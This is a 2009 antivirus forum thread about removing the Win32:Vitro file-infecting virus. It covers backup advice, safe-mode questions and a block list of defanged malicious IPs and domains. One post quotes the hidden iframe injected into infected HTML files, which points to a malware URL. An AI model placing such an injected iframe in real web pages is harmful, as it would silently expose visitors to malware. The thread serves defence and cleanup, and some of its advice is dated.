Author Topic: Malware name Win32:Vitro  (Read 340194 times)

0 Members and 1 Guest are viewing this topic.

orangbego

  • Guest
Re: Malware name Win32:Vitro
« Reply #270 on: May 26, 2009, 08:31:20 AM »
@all : if Dr. Web Live and AVIRA Live Rescue CD got some errors, just try another Antivirus Rescue CD, recommended is AVAST Live CD.

Antiweapon

  • Guest
Re: Malware name Win32:Vitro
« Reply #271 on: May 29, 2009, 08:53:45 AM »
Hey all, I recently got attacked by this ass of a virus.
I decided to just take the easy way out and reformat, but I want to backup some things before I do.
I was wondering if I was in safe mode when I did the backups to a external harddrive, would it get infected? I wouldn't be backing up any exes just music and files, the Harddrive in question hasn't been plugged into the infected computer for a while so im almost positive its not infected, but it does have a few Exes on there, is there any chance they would get infected If I plugged it in during safe mode?

Offline Omid Farhang

  • Frontend Developer
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1660
  • I wish I could write longer personal text!!
    • Homepage
Re: Malware name Win32:Vitro
« Reply #272 on: May 29, 2009, 09:41:00 AM »
Hey all, I recently got attacked by this ass of a virus.
I decided to just take the easy way out and reformat, but I want to backup some things before I do.
I was wondering if I was in safe mode when I did the backups to a external harddrive, would it get infected? I wouldn't be backing up any exes just music and files, the Harddrive in question hasn't been plugged into the infected computer for a while so im almost positive its not infected, but it does have a few Exes on there, is there any chance they would get infected If I plugged it in during safe mode?

back up your files in external drives (No .exe and .dll)

reformat hard drive

do a clean install of windows.

scan your external hard drive using updated antivirus before restore your backup files :)
Twitter: OmidFarhangEn - OS: Manjaro KDE

Drakkar

  • Guest
Re: Malware name Win32:Vitro
« Reply #273 on: May 30, 2009, 10:51:32 PM »
Hey all, I recently got attacked by this ass of a virus.
I decided to just take the easy way out and reformat, but I want to backup some things before I do.
I was wondering if I was in safe mode when I did the backups to a external harddrive, would it get infected? I wouldn't be backing up any exes just music and files, the Harddrive in question hasn't been plugged into the infected computer for a while so im almost positive its not infected, but it does have a few Exes on there, is there any chance they would get infected If I plugged it in during safe mode?


yes,that darn virus infects windows processes,wich are run even in safe mode
what you can do is backup using a MS-DOS diskette if you want to try,the virus won't ever run while in MS-DOS

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Malware name Win32:Vitro
« Reply #274 on: May 30, 2009, 10:55:40 PM »
Hi Drakkar,

Just a good tip from the past you offered there, but there are loads of modern computers that have no floppy drive or a diskette driveas it was called by Microsoft anymore. Also the file infector is not active in SafeMode,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Spikedbeast

  • Guest
Re: Malware name Win32:Vitro
« Reply #275 on: May 31, 2009, 07:36:58 PM »
OneRing2Rule ...

I'm sorry... I'm battling with Vitro tooo and I have to warn you... Vitro infects HTML files.
I've found it in many html help files and is in every driver of the compuer I'm fixing.

I did a back up of all the music and files, but when I copy them Vitro apears and I have to start the nuke again...
this one is hard...

ekay417

  • Guest
Re: Malware name Win32:Vitro
« Reply #276 on: June 04, 2009, 02:07:33 AM »
Hi,

I had some general questions about backing up my data among others.

First, here’s some background info. on how my computer got infected (Sorry for the length.):

Back in April, my desktop got heavily infected. It was running on Windows XP Home Edition SP3. After doing a scan with McAfee (which came with my ISP) at the time, it moved several files including many important files from the WINDOWS folder. After I rebooted my computer at the time, I was subsequently locked out as I found out that I had a “login loop error” if I recall correctly. I was able to log back in after following a helpful guide on the Internet and running some bootable software.

The guide then suggested to run various software in Safe Mode such as Avast!, Spybot, and other various programs. I burned these programs onto a CD using my spare labtop. I was able to install some of the programs successfully while with others I ran into several roadblocks. I ran a boot-time scan with Avast!, and afterwards it found several infected files but none due to Vitro at the time. Then I ran a full thorough scan of my computer in Safe Mode, and it again found several infected files but none due to Vitro.

There were also other problems in Safe Mode. I found that a lot of .exe’s were missing and all my Microsoft Office Applications wouldn’t work along with notepad. Also, anytime I tried to right click on a file, my screen would flash and close any windows that I had open. Then, it would ask if I wanted to continue in Safe Mode indicating that System Restore wouldn’t be available if I did continue in Safe Mode, and I would always press OK to continue in Safe Mode again.

After discussing the problems I had with the creator of the guide, he said the computer seemed to be heavily infected and suggested to reinstall Windows from scratch. But he suggested doing a repair installation as a long shot though before reinstalling Windows from scratch. I used a Dell OS Reinstallation XP Home Edition SP1 CD to run the repair installation, and I ran into several errors because it couldn’t find certain files. But somehow I was able to complete a repair installation. Entering into safe mode after the repair installation, I could now open my Microsoft Office Applications, but I couldn’t right click on files without my screen flashing and then proceeding to close all open windows. I then proceeded to open Avast!, and after finding something wrong with my Operating Memory, it scheduled a boot-time scan. It was during the boot-time scan, that the Vitro virus was then detected. It said C:\WINDOWS\SYSTEM32\sdbinst.exe was infected by Win:32Vitro, and I had no other option but to delete it.

At this point, I’ve come to a realization that the best option is to do a fresh installation of Windows, but I want to back-up all my Microsoft Office files such as .doc, .xls, .ppt and media such as pictures, mp3s, and video files including .wmv, .mpeg, and .flv. I don’t particularly need any of the .exe files. In terms of importance, I need the Microsoft Office files above everything else. All of these files could fit onto a CD, but I can’t access my burning software because it’s missing.  I don’t have a flash drive or external hard drive, but I was planning on buying an external hard drive to try to backup all of my files.

The questions I had concerning my situation after reading previous posts on this thread were the following: (Sorry if I’m repeating the same questions, but I wanted to make sure I got the correct answers in accordance to my situation. And sorry if these questions sound dumb, I’m not too advanced when it comes to computers.)

If I transferred applications such as Avast!, Spybot, and other software over to my infected computer using a CD, would this infect the CD? Would it infect the transferred software?

Is it safe to continue to operate in Safe Mode?

If I’ve continuously rebooted over and over in Safe Mode for a period of 2 weeks within the last 2 months but never in Normal Mode, will it make my computer any worse than what it is now? I’ve disconnected the infected computer from my home network, never went in Normal Mode, or connected to the Internet since this problem has occurred.

Is it safe to run applications and open files in Safe Mode? Will the Vitro virus infect any additional applications and files in Safe Mode?

I read in previous posts how the virus infects .htm/.html files, will it be safe to even attempt to open these in Safe Mode? The reason I ask is if possible, I would like to retain some of the information in these files such as certain logs by copying the text into a word file.

I read how the virus goes after certain media files such as .mp3 and .wmv, will it be safe to backup these files? Also, does the virus go after .flv files?

Can I backup files to an external hard drive in Safe Mode? I read how flash drives can become infected, can the virus spread to the external hard drive?

If backing up files to an external hard drive in Safe Mode is possible, will Vitro appear when copying these files?

Also, why wasn't Vitro detected when I first ran the scans with Avast! before the repair installation? It wasn't detected until after the repair installation during the boot-time scan.
« Last Edit: June 04, 2009, 02:13:08 AM by ekay417 »

mat05e

  • Guest
Re: Malware name Win32:Vitro
« Reply #277 on: June 06, 2009, 08:15:59 PM »
So I had the same problems as you, and I was beginning to get frustrated because none of the advice on these boards were working.  I did a little research and found, that as someone previously stated, that this virus comes from the Ukraine.  After some research, I found a antivirus from Ukraine that seems to fix the problem called True Sword 4.  It is a free download and gives you 10 free solutions to the problem...

Unfortunately, this trojan as you probably know by now infects more than 10 parts of your system... but maybe it will free up enough of the worm that it is coupled with (called the convoker worm)sp?   to allow you to execute some other antivirus softwares.

Gortwiz

  • Guest
Re: Malware name Win32:Vitro
« Reply #278 on: June 07, 2009, 11:12:27 PM »
Hello everyone!  This is my first post here.  I have been reading this thread and I am in the same boat as many others here.  I was hit with virut/vitro about 2 months ago on my Vista desktop.  I thought I got rid of it (repaired with DrWeb live cd).  I ran everything (except Avast) including avg8.5, SuperAntiSpyware, Spybot S&D, AdAware, DrWebCureit, Windows Defender, Malware bytes  all error free offline.  I then ran (still offline) many games and other apps with no apparent problems for a week or two, scanning every night for virus/malware.  Then being fairly confident it was gone, went back online and updated Vista and the others with the latest signatures, went offline and ran everything again without any errors.  I then started using Vista online again for about a month with no problems again running full scans several times a week. I thought I had defeated this dreaded beast!

About 2 weeks ago I was going to install a new game (Burnout Paradise) so I updated everything including avg8.5.  I also remember getting a popup about updating java which I accepted (in retrospect may have been bogus), and updated Firefox to the latest version as well.  Then I went offline and ran a full scan with Avg8.5 and KaBoom!  It found thousands of html/framer viruses (same as Avast HTML:Iframe-inf).  Almost every htm, html, asp on my machine was infected, BUT there were NO other virus/malware found.  I even got the latest DrWebLive Cd and it ran error free.  I thought the html/framer that avg found might be a false positive, but upon some research I found
 
"<iframe src="hxxp://jL.chura.pl/rc/" style="display:none"></iframe>"

was at the bottom of the infected files. I then downloaded Avast (from this XP machine) and put in on Vista and ran a full scan.  It did NOT detect the iframe but did find 5 exe's that had win32:Vitro.  I put them in quarantine, then Shut down avg8.5, ran Avast again, and this time it found the 6 thousand html:Iframe-inf.  So apparently avg8.5 somehow stops Avast from finding this.  Most importantly, Avast did find and remove the 5 win32:Vitro that NO other anti-virus/malware could detect.  Based on this, I will be dumping avg and installing avast whether I fix this problem or not.

To fix the iframe problem I tried the freeware htm auto_replace tool that was mentioned in this forum.  I was able to fix all of my D: drive, and most of the C: drive so this utility is great.  The only problem is that there a several folders on the C: drive that can't be changed.  This is where I need help from someone with more knowledge than I about Vista.  I ran this utility under the real administrator and it reports that the files are changed, but if I check again, nothing has been changed.  Here is one the file paths;

C:\User\don\AppData\Local\VirtualStore\ProgramFiles\Adobe\Reader8.0\Reader\Howto
\Enu\ hundreds of html's

There are a few others under the VirtualStore\ProgramFiles\ that can't be changed as well.  I also tried running SafeMode, but same problem.

I am hoping that with all the knowledge on this forum that someone can help or at least point me in the right direction.  I can go to these locations, rename the html to txt and open them with notepad, make changes, but when trying to save it I get some message about can't change this file.  Looking at the file attributes, it is not read only, so I am at a loss here.  I also turned off UAC but no difference.  How can this virus get in here and I can't?

Sorry for the length here.  I know that I may not beat this thing, but since I can still use XP for the net, I can spend a few weeks trying to fix the Vista machine.

One final question...  IF I get all of the iframes fixed, and IF Avast and everything else runs without errors, is there anything else I should do before running Vista online?

This virut/vitro really sucks!  I read about a few here who have said they beat it.  I would like anyone who really has to reaffirm this.  Also anyone who really thought they got rid of it (like me a few months ago) and got nailed again, please post and let us know that as well.

Many thanks to everyone on this forum!



 

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Malware name Win32:Vitro
« Reply #279 on: June 08, 2009, 12:11:53 AM »
Howdy Gortwitz,

Yes this a monster of a thing to combat. Apparently you were re-infected online via the Vitro infecting site. These have to be blocked absolutely with SpywareBlaster where you can specify these separately or via the use of a host file.
Block these IP addresses:
61,235,117,80     (ntkmpla dot info)
221,5,74,38     (zief dot pl)
212,85,96,95     (jL dot chupa dot nl)
218,93,205,30     (jL dot chura dot nl)
(Replace the commas with dots)
Any contact with this buggy file infector via peripherals, data, back-ups, network, online sources, cache etc. etc. will lead to a re-infect that when not in SafeMode will go through your OS like a bush fire and will try to infect everything and succeeds in some completely, some randomly spared, some partly - that is why it is so difficult to repair from an infection.
So effectively it is either block the file infector or throw in the towel - fdisk, re-format, re-install.
There is a rumor there is a Ukrainian repair tool because the file infector was apparently malcreated there, but if this is only a rumor, I do not know. Thanks for reporting here and for the further information gained on this nastiness,

polonus
« Last Edit: June 08, 2009, 12:18:00 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

YoKenny

  • Guest
Re: Malware name Win32:Vitro
« Reply #280 on: June 08, 2009, 02:46:33 AM »
Quote
These have to be blocked absolutely with SpywareBlaste
How can SpywareBlaster block IP addresses or URLs as it uses CLSIDs for blocking?

I have requested that the URLs be added to hpHosts file though.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88897
  • No support PMs thanks
Re: Malware name Win32:Vitro
« Reply #281 on: June 08, 2009, 03:43:10 AM »
It also adds URLs to the Restricted Sites (IE only) area, that's how ;D
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

YoKenny

  • Guest
Re: Malware name Win32:Vitro
« Reply #282 on: June 08, 2009, 03:57:00 AM »
It also adds URLs to the Restricted Sites (IE only) area, that's how ;D

How do you add the URLs to the Restricted Sites (IE only) area?

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88897
  • No support PMs thanks
Re: Malware name Win32:Vitro
« Reply #283 on: June 08, 2009, 04:07:05 PM »
It is done automatically by the updates, so if the urls are in the update then they would be blocked.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

YoKenny

  • Guest
Re: Malware name Win32:Vitro
« Reply #284 on: June 08, 2009, 09:31:27 PM »
It is done automatically by the updates, so if the urls are in the update then they would be blocked.
They are not there according to ZonedOut and I have the latest SpywareBlaster updates installed:
http://www.funkytoad.com/index.php?option=com_content&view=article&id=15&Itemid=33